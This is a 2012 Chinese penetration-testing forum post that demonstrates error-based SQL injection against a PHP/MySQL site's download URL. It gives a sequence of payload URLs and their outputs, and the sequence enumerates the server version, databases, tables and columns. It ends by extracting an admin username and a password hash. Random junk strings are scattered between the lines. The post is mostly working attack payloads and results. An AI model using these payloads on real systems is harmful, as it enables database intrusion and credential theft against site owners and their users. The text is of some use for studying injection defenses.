中国网络渗透测试联盟
标题:
php+mysql高级爆错注入经测算有效
[打印本页]
作者:
admin
时间:
2012-9-13 17:52
标题:
php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
6 Y' K* x2 [8 Y5 y2 A! o
) \; {" _$ Y3 f' ]2 e7 I- b+ |
之前想找个测试 没想到这有 可以测试下做个记录而已
4 f9 }0 J5 x, Y0 V
# c+ n2 y8 z6 Y g& Q
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
$ a4 A/ F- r- v3 k1 a
+ U& V- O4 W+ u$ a/ ~- B: o2 a1 D
/data0/htdocs/leqi_new/app/myapp.php
5 ~3 a5 u/ J6 y7 {1 {
/ Y+ d2 U' Q6 V. e
或者
# J; B9 H' y) g5 f! A
3 n0 M* K1 t# {" ?( z
/**********version()**********/ 5.1.49-log
; u( C# j' J! |# j
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 L( w1 \4 i `4 p$ G1 J
3 M1 a0 K' ^( @9 j; F; T7 m
/**********user()**********/
; t! ^$ x) |7 ~5 ^5 Z" S
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ C( T" H8 |3 T1 k# g( i
: p) d$ U4 _5 A8 P' U" |4 X5 `
/**********database()**********/ leqi
4 j0 l- I' a, a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 j& D! [, `. _! q3 d+ `2 w3 D! Z
3 w( j7 W; G) e# i: I
/**********limit依次递归爆库**********/
I- x2 I @$ U, m( u3 B$ ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
Z/ X: I( C9 l5 h! u' S7 f
information_schema
I% K& d' S' }- ?8 l% g
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
P$ S5 Z6 c' g0 q2 G
leqi
i; {% Z6 c/ n( W5 g6 R ^# K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 x% m/ e, ]& o6 j/ p0 I8 ?! y
test
+ l/ g6 |& s, L+ r+ G8 P U+ L. z3 c
/ ?8 a* b; t! v
/**********limit依次递归爆表名**********/
3 e7 k6 e& g6 Y7 x7 a1 G8 y8 y2 D6 P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 y' A- z0 ^+ ? ]% @ I0 d+ H
users
7 Z1 \6 q. d0 Z" X
7 g( M! p6 v2 W3 f0 @) A
/**********limit依次递归爆字段名**********/
. B0 T! Y: u0 u' \% T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 ~+ E4 P/ Q9 Y0 Z. f* t
user_id,username,nickname,passwd,group_id
% a' w' y" P7 Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' ~% {1 ?! x* a3 s9 z
/wapc/5000_0005_003
6 l( c4 e, j7 D9 R' F2 ?0 {
11 21
; K* b, X; w" z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 u+ p" Z' N- j" t1 J( b0 i
/wapc/5000_0005_003
+ m& ]1 N2 _$ o c' j+ d# }3 q, a
11 341 351 361
+ o/ ~1 O' Z/ h$ C* J
/**********爆数据**********/
1 k* k! M4 b; B) W
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 `- N: C2 W I1 Y1 @9 ~( S
admin
; F b- F3 `, c, ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
. V e' s$ w3 @$ O7 ^0 \! I- ?* K
6a8b4574ca231eb8bd52764d4978ffcd
+ Z* D0 c) }# l$ t( B* `2 B
* A& r: @( Y0 Y5 v# X
* T0 m, F6 E! m
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2